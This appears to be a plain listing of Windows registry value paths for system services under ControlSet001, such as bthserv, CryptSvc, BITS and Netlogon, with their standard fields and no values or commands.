HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSDTC\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MSiSCSI\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\msiserver\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Netlogon\Tag 